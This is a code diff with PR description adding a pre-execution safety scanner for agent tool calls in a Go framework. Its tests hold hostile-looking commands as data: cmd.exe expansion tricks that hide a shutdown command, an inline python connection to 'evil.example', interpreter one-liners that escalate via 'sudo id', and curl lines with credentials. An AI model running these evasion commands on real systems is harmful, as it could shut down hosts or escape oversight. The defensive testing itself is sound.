+				strings.Contains(report.SafeSummary, tc.secret) {
+				t.Fatalf("report retained the credential: %+v", report)
+			}
+			raw, err := json.Marshal(report)
+			if err != nil {
+				t.Fatal(err)
+			}
+			if bytes.Contains(raw, []byte(tc.secret)) {
+				t.Fatalf("serialized report leaked the credential: %s", raw)
+			}
+			var event bytes.Buffer
+			if err := WriteAuditJSONL(&event, report); err != nil {
+				t.Fatal(err)
+			}
+			if bytes.Contains(event.Bytes(), []byte(tc.secret)) {
+				t.Fatalf("audit event leaked the credential: %s", event.String())
+			}
+		})
+	}
+}
+
+// TestToolMetadataReusesFrameworkContract locks the guard onto the framework
+// metadata contract. A field added to tool.ToolMetadata must reach a scan
+// without updating a parallel type here.
+func TestToolMetadataReusesFrameworkContract(t *testing.T) {
+	meta := tool.ToolMetadata{
+		ReadOnly:        true,
+		Destructive:     true,
+		ConcurrencySafe: true,
+		SearchOrRead:    true,
+		OpenWorld:       true,
+		MaxResultSize:   4096,
+	}
+	// The alias makes assignment in both directions a compile-time guarantee.
+	var guardMeta ToolMetadata = meta
+	if tool.ToolMetadata(guardMeta) != meta {
+		t.Fatalf("guard metadata = %+v, want %+v", guardMeta, meta)
+	}
+	req, ok, err := RequestFromPermissionRequest(&tool.PermissionRequest{
+		ToolName:  "workspace_exec",
+		Arguments: []byte(`{"command":"go test ./..."}`),
+		Metadata:  meta,
+	})
+	if err != nil || !ok {
+		t.Fatalf("ok = %v, err = %v", ok, err)
+	}
+	if req.Metadata != meta {
+		t.Fatalf("request metadata = %+v, want %+v", req.Metadata, meta)
+	}
+}
+
+// TestAppendAuditFilePropagatesCloseError proves that a delayed write failure
+// surfaced only at close is reported, so a caller cannot treat an uncommitted
+// event as audited.
+func TestAppendAuditFilePropagatesCloseError(t *testing.T) {
+	original := openAuditFile
+	t.Cleanup(func() { openAuditFile = original })
+
+	closeErr := errors.New("close failed")
+	sink := &failingCloser{}
+	openAuditFile = func(string) (io.WriteCloser, error) {
+		return sink, nil
+	}
+
+	sink.closeErr = closeErr
+	if err := AppendAuditFile("audit.jsonl", Report{
+		Decision: DecisionAllow, RuleID: "ok", RiskLevel: RiskLow,
+	}); !errors.Is(err, closeErr) {
+		t.Fatalf("AppendAuditFile close error = %v, want %v", err, closeErr)
+	}
+	if !sink.closed {
+		t.Fatal("audit file was not closed")
+	}
+
+	// A write failure keeps precedence, and the file is still closed.
+	sink2 := &failingCloser{writeErr: errors.New("write failed"), closeErr: closeErr}
+	openAuditFile = func(string) (io.WriteCloser, error) { return sink2, nil }
+	err := AppendAuditFile("audit.jsonl", Report{
+		Decision: DecisionAllow, RuleID: "ok", RiskLevel: RiskLow,
+	})
+	if !errors.Is(err, sink2.writeErr) {
+		t.Fatalf("AppendAuditFile write error = %v, want %v", err, sink2.writeErr)
+	}
+	if !sink2.closed {
+		t.Fatal("audit file was not closed after a write failure")
+	}
+
+	// The permission path must refuse to allow an execution it could not audit.
+	openAuditFile = func(string) (io.WriteCloser, error) { return &failingCloser{closeErr: closeErr}, nil }
+	policy := NewPermissionPolicy(DefaultPolicy(), WithAuditPath("audit.jsonl"))
+	decision, err := policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+		ToolName:  "workspace_exec",
+		Arguments: []byte(`{"command":"go test ./..."}`),
+	})
+	if err == nil {
+		t.Fatal("CheckToolPermission audit close error = nil")
+	}
+	if decision.Action != tool.PermissionActionDeny {
+		t.Fatalf("audit close error action = %q, want deny", decision.Action)
+	}
+}
+
+type failingCloser struct {
+	writeErr error
+	closeErr error
+	closed   bool
+}
+
+func (f *failingCloser) Write(p []byte) (int, error) {
+	if f.writeErr != nil {
+		return 0, f.writeErr
+	}
+	return len(p), nil
+}
+
+func (f *failingCloser) Close() error {
+	f.closed = true
+	return f.closeErr
+}
+
+// TestScanFailsClosedOnWindowsCmdExpansion proves that every cmd.exe expansion
+// form is blocked. cmd.exe rewrites the token before execution, so a modifier
+// can resolve to an executable the scan never sees.
+func TestScanFailsClosedOnWindowsCmdExpansion(t *testing.T) {
+	for _, tc := range []struct {
+		name    string
+		command string
+	}{
+		{"plain variable", `%COMSPEC% /c shutdown /s /t 0`},
+		{"substitution modifier", `%COMSPEC:cmd.exe=shutdown.exe% /s /t 0`},
+		{"substitution with wildcard", `%COMSPEC:*\=shutdown.exe% /s /t 0`},
+		{"substring modifier", `%COMSPEC:~0,3% /c shutdown /s /t 0`},
+		{"negative substring modifier", `%PATH:~-4% /c shutdown`},
+		{"caret escape", `sh^utdown /s /t 0`},
+	} {
+		t.Run(tc.name, func(t *testing.T) {
+			report := Scan(Request{
+				ToolName:       "exec_command",
+				Backend:        BackendHostExec,
+				Command:        tc.command,
+				TimeoutSeconds: 10,
+			}, DefaultPolicy())
+			if report.Decision != DecisionDeny {
+				t.Fatalf("decision = %q, want deny: %+v", report.Decision, report)
+			}
+		})
+	}
+
+	// A workspace command is parsed by the POSIX grammar and is unaffected.
+	report := Scan(Request{
+		ToolName:       "workspace_exec",
+		Backend:        BackendWorkspaceExec,
+		Command:        "go test ./...",
+		TimeoutSeconds: 10,
+	}, DefaultPolicy())
+	if report.Decision != DecisionAllow {
+		t.Fatalf("workspace decision = %q, want allow: %+v", report.Decision, report)
+	}
 }

--- a/tool/safety/safety_test.go
+++ b/tool/safety/safety_test.go
@@ -22,6 +22,7 @@ import (
 	"sync"
 	"testing"
 
+	"trpc.group/trpc-go/trpc-agent-go/codeexecutor"
 	itool "trpc.group/trpc-go/trpc-agent-go/internal/tool"
 	"trpc.group/trpc-go/trpc-agent-go/tool"
 	"trpc.group/trpc-go/trpc-agent-go/tool/hostexec"
@@ -313,6 +314,46 @@ func TestLoadPolicyRejectsUnknownFields(t *testing.T) {
 				t.Fatal("LoadPolicy unknown field error = nil")
 			}
 		})
+	}
+}
+
+func TestLoadPolicyRejectsInvalidUnknownToolAction(t *testing.T) {
+	path := filepath.Join(t.TempDir(), "policy.yaml")
+	if err := os.WriteFile(
+		path,
+		[]byte("unknown_tool_action: execute\n"),
+		0o600,
+	); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := LoadPolicy(path); err == nil ||
+		!strings.Contains(err.Error(), "unknown_tool_action") {
+		t.Fatalf("LoadPolicy invalid unknown_tool_action error = %v", err)
+	}
+}
+
+func TestLoadPolicyConfiguresUnknownToolAction(t *testing.T) {
+	path := filepath.Join(t.TempDir(), "policy.yaml")
+	if err := os.WriteFile(
+		path,
+		[]byte("unknown_tool_action: allow\n"),
+		0o600,
+	); err != nil {
+		t.Fatal(err)
+	}
+	policy, err := LoadPolicy(path)
+	if err != nil {
+		t.Fatal(err)
+	}
+	decision, err := NewPermissionPolicy(policy).CheckToolPermission(
+		context.Background(),
+		&tool.PermissionRequest{ToolName: "unknown_tool"},
+	)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionAllow {
+		t.Fatalf("action = %q, want allow", decision.Action)
 	}
 }
 
@@ -1122,7 +1163,7 @@ func TestPermissionPolicyUsesExtensionRequestParser(t *testing.T) {
 	}
 }
 
-func TestPermissionPolicyAllowsUnknownToolAndNilRequest(t *testing.T) {
+func TestPermissionPolicyHandlesUnknownTool(t *testing.T) {
 	policy := NewPermissionPolicy(DefaultPolicy())
 	decision, err := policy.CheckToolPermission(context.Background(), nil)
 	if err != nil {
@@ -1139,8 +1180,121 @@ func TestPermissionPolicyAllowsUnknownToolAndNilRequest(t *testing.T) {
 	if err != nil {
 		t.Fatal(err)
 	}
-	if decision.Action != tool.PermissionActionAllow {
-		t.Fatalf("unknown tool action = %q, want allow", decision.Action)
+	if decision.Action != tool.PermissionActionAsk ||
+		!strings.Contains(decision.Reason, "unknown_tool") {
+		t.Fatalf("unknown tool decision = %+v, want ask", decision)
+	}
+
+	for _, tc := range []struct {
+		name   string
+		action tool.PermissionAction
+		want   tool.PermissionAction
+	}{
+		{name: "allow", action: tool.PermissionActionAllow, want: tool.PermissionActionAllow},
+		{name: "deny", action: tool.PermissionActionDeny, want: tool.PermissionActionDeny},
+		{name: "invalid fails closed", action: "execute", want: tool.PermissionActionDeny},
+	} {
+		t.Run(tc.name, func(t *testing.T) {
+			config := DefaultPolicy()
+			config.UnknownToolAction = tc.action
+			guard := NewPermissionPolicy(config)
+			got, err := guard.CheckToolPermission(
+				context.Background(),
+				&tool.PermissionRequest{ToolName: "unknown_tool"},
+			)
+			if err != nil {
+				t.Fatal(err)
+			}
+			if got.Action != tc.want {
+				t.Fatalf("action = %q, want %q: %+v", got.Action, tc.want, got)
+			}
+		})
+	}
+}
+
+func TestPermissionPolicyHonorsCanceledContext(t *testing.T) {
+	ctx, cancel := context.WithCancel(context.Background())
+	cancel()
+	decision, err := NewPermissionPolicy(DefaultPolicy()).CheckToolPermission(
+		ctx,
+		&tool.PermissionRequest{
+			ToolName:  "workspace_exec",
+			Arguments: []byte(`{"command":"go test ./..."}`),
+		},
+	)
+	if !errors.Is(err, context.Canceled) {
+		t.Fatalf("error = %v, want context.Canceled", err)
+	}
+	if decision.Action != tool.PermissionActionDeny {
+		t.Fatalf("action = %q, want deny", decision.Action)
+	}
+}
+
+func TestPermissionPolicyScansInlineInterpreterPayloads(t *testing.T) {
+	guard := NewPermissionPolicy(DefaultPolicy())
+	for _, tc := range []struct {
+		name    string
+		command string
+		want    tool.PermissionAction
+		ruleID  string
+	}{
+		{
+			name:    "python network",
+			command: `python -c "import socket; socket.create_connection(('evil.example',443))"`,
+			want:    tool.PermissionActionDeny,
+			ruleID:  "network.non_whitelisted_domain",
+		},
+		{
+			name:    "python shell bridge",
+			command: `python -c "import os; os.system('sudo id')"`,
+			want:    tool.PermissionActionAsk,
+			ruleID:  "codeexec.host_command_bridge",
+		},
+		{
+			name:    "node shell bridge",
+			command: `node -e "require('child_process').execSync('sudo id')"`,
+			want:    tool.PermissionActionAsk,
+			ruleID:  "codeexec.host_command_bridge",
+		},
+		{
+			name:    "node attached long option",
+			command: `node --eval="require('child_process').execSync('sudo id')"`,
+			want:    tool.PermissionActionAsk,
+			ruleID:  "codeexec.host_command_bridge",
+		},
+		{
+			name:    "ruby shell bridge",
+			command: `ruby -e "system('sudo id')"`,
+			want:    tool.PermissionActionAsk,
+			ruleID:  "codeexec.host_command_bridge",
+		},
+		{
+			name:    "ruby attached short option",
+			command: `ruby -e"system('sudo id')"`,
+			want:    tool.PermissionActionAsk,
+			ruleID:  "codeexec.host_command_bridge",
+		},
+	} {
+		t.Run(tc.name, func(t *testing.T) {
+			args, err := json.Marshal(map[string]any{"command": tc.command})
+			if err != nil {
+				t.Fatal(err)
+			}
+			decision, err := guard.CheckToolPermission(
+				context.Background(),
+				&tool.PermissionRequest{
+					ToolName:  "workspace_exec",
+					Arguments: args,
+				},
+			)
+			if err != nil {
+				t.Fatal(err)
+			}
+			if decision.Action != tc.want ||
+				!strings.Contains(decision.Reason, tc.ruleID) {
+				t.Fatalf("unexpected decision: %+v", decision)
+			}
+		})
 	}
 }
 
@@ -2569,6 +2723,98 @@ func TestScanRedactsAuthorizationCredentials(t *testing.T) {
 	}
 }
 
+func TestScanRedactsURLAndCurlUserCredentials(t *testing.T) {
+	for _, tc := range []struct {
+		name    string
+		command string
+		secret  string
+	}{
+		{
+			name:    "URL userinfo",
+			command: `curl https://alice:hunter2@api.github.com`,
+			secret:  "hunter2",
+		},
+		{
+			name:    "short user option",
+			command: `curl -u alice:hunter2 https://api.github.com`,
+			secret:  "hunter2",
+		},
+		{
+			name:    "quoted short user option",
+			command: `curl -u 'alice:hunter two' https://api.github.com`,
+			secret:  "hunter two",
+		},
+		{
+			name:    "long user option",
+			command: `curl --user=alice:hunter2 https://api.github.com`,
+			secret:  "hunter2",
+		},
+		{
+			name:    "password containing colon",
+			command: `curl --user alice:hunter:two https://api.github.com`,
+			secret:  "hunter:two",
+		},
+		{
+			name:    "quoted proxy user option",
+			command: `curl --proxy-user "alice:hunter two" https://api.github.com`,
+			secret:  "hunter two",
+		},
+		{
+			name:    "short option after quoted URL metacharacter",
+			command: `curl 'https://api.github.com?a=1&b=2' -u alice:hunter2`,
+			secret:  "hunter2",
+		},
+	} {
+		t.Run(tc.name, func(t *testing.T) {
+			report := Scan(Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  tc.command,
+			}, DefaultPolicy())
+			if report.Decision != DecisionDeny || !report.Redacted ||
+				!reportHasRule(report, "sensitive.secret_leak") {
+				t.Fatalf("credential command was not denied and redacted: %+v", report)
+			}
+			raw, err := json.Marshal(report)
+			if err != nil {
+				t.Fatal(err)
+			}
+			if bytes.Contains(raw, []byte(tc.secret)) {
+				t.Fatalf("serialized report leaked the credential: %s", raw)
+			}
+			var event bytes.Buffer
+			if err := WriteAuditJSONL(&event, report); err != nil {
+				t.Fatal(err)
+			}
+			if bytes.Contains(event.Bytes(), []byte(tc.secret)) {
+				t.Fatalf("audit event leaked the credential: %s", event.String())
+			}
+		})
+	}
+
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "docker run -u 1000:1000 image",
+	}, DefaultPolicy())
+	if report.Decision != DecisionAllow || report.Redacted {
+		t.Fatalf("unrelated -u value was treated as a credential: %+v", report)
+	}
+
+	report = Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "curl -u alice:first -u bob:second https://api.github.com",
+	}, DefaultPolicy())
+	raw, err := json.Marshal(report)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if bytes.Contains(raw, []byte("first")) || bytes.Contains(raw, []byte("second")) {
+		t.Fatalf("serialized report leaked one of multiple credentials: %s", raw)
+	}
+}
+
 // TestToolMetadataReusesFrameworkContract locks the guard onto the framework
 // metadata contract. A field added to tool.ToolMetadata must reach a scan
 // without updating a parallel type here.
@@ -2596,6 +2842,14 @@ func TestToolMetadataReusesFrameworkContract(t *testing.T) {
 	}
 	if req.Metadata != meta {
 		t.Fatalf("request metadata = %+v, want %+v", req.Metadata, meta)
+	}
+}
+
+func TestCodeBlockReusesCodeexecutorContract(t *testing.T) {
+	want := codeexecutor.CodeBlock{Language: "python", Code: "print(1)"}
+	var got CodeBlock = want
+	if got != want {
+		t.Fatalf("guard code block = %+v, want %+v", got, want)
 	}
 }
 

--- a/tool/workspaceexec/workspace_exec.go
+++ b/tool/workspaceexec/workspace_exec.go
@@ -41,6 +41,9 @@ const (
 	defaultWorkspaceExecTimeout = 5 * time.Minute
 	defaultWorkspaceWriteYield  = 200
 	outputTruncatedMarker       = "\n...[output truncated]...\n"
+	// DefaultTimeoutSeconds is the effective workspace_exec timeout when all
+	// supported timeout arguments are omitted or non-positive.
+	DefaultTimeoutSeconds = int(defaultWorkspaceExecTimeout / time.Second)
 )
 
 // Environment variables that mirror the option names; useful for
@@ -84,6 +87,23 @@ type ExecTool struct {
 	sessions map[string]*execSession
 	ttl      time.Duration
 	clock    func() time.Time
+}
+
+// ResolveExecPermissionContext resolves arguments exactly as prepareExec does
+// without creating a workspace or starting a process.
+func (t *ExecTool) ResolveExecPermissionContext(
+	args []byte,
+) (tool.ExecPermissionContext, error) {
+	var in execInput
+	if err := json.Unmarshal(args, &in); err != nil {
+		return tool.ExecPermissionContext{}, fmt.Errorf("invalid args: %w", err)
+	}
+	cwd, err := normalizeCWD(in.Cwd)
+	if err != nil {
+		return tool.ExecPermissionContext{}, err
+	}
+	timeout := resolveExecTimeoutSeconds(in)
+	return tool.ExecPermissionContext{Cwd: cwd, TimeoutSeconds: timeout}, nil
 }
 
 // WriteStdinTool sends additional stdin to a running workspace_exec session.
@@ -643,10 +663,7 @@ func (t *ExecTool) prepareExec(
 	if err := checkRunnerSupportsPolicy(eng, policyActive); err != nil {
 		return execRequest{}, err
 	}
-	timeout := firstIntValue(in.TimeoutSec, in.TimeoutSecOld)
-	if timeout <= 0 {
-		timeout = in.Timeout
-	}
+	timeout := resolveExecTimeoutSeconds(in)
 	return execRequest{
 		background: in.Background,
 		tty:        firstBoolValue(in.TTY, in.PTY),
@@ -713,6 +730,17 @@ func (t *ExecTool) executeWorkspaceAttempt(
 	}
 	out, err := t.callNonSessional(ctx, *req)
 	return out, true, err
+}
+
+func resolveExecTimeoutSeconds(in execInput) int {
+	timeout := firstIntValue(in.TimeoutSec, in.TimeoutSecOld)
+	if timeout <= 0 {
+		timeout = in.Timeout
+	}
+	if timeout <= 0 {
+		return DefaultTimeoutSeconds
+	}
+	return timeout
 }
 
 // checkCommandPolicy enforces the optional allow/deny lists. When no
@@ -1357,6 +1385,7 @@ func isAllowedWorkspacePath(rel string) bool {
 
 var _ tool.Tool = (*ExecTool)(nil)
 var _ tool.CallableTool = (*ExecTool)(nil)
+var _ tool.ExecPermissionContextResolver = (*ExecTool)(nil)
 var _ tool.Tool = (*WriteStdinTool)(nil)
 var _ tool.CallableTool = (*WriteStdinTool)(nil)
 var _ tool.Tool = (*KillSessionTool)(nil)


### PR DESCRIPTION
## What changed

- Adds an opt-in pre-execution safety policy for `workspace_exec`, `exec_command`, and `execute_code`.
- Scans commands and code blocks for dangerous commands, denied paths, non-allowlisted network access, secret exposure, and resource-policy violations.
- Supports custom execution tools through request parsers and emits redacted reports, JSONL audit events, and OpenTelemetry attributes.
- Preserves executor-resolved cwd and timeout semantics, recognizes wrapped or renamed built-in tools, and fails closed when a code executor cannot prove a finite timeout.

## Why

Agent tool calls can cross filesystem, process, network, and credential boundaries. The framework needs a reusable execution-time policy hook that applications can enable without changing existing tool defaults.

## Testing

- `go test ./tool/codeexec ./tool/safety`
- `go test -run '^TestNewEnvInjectingCodeExecutor_PreservesCodeExecutor$' ./codeexecutor`
- `go test -run '^$' ./codeexecutor/local ./codeexecutor/sandbox ./codeexecutor/e2b`
- `go vet ./tool/codeexec ./tool/safety`
- `go build ./...`

## Notes for reviewers

This change adds public capability interfaces for permission-context and execution-timeout discovery. They are optional and do not extend the base `CodeExecutor` interface. Existing execution defaults remain unchanged; the safety policy is opt-in and asks for approval for unknown tools by default.

Fixes #2002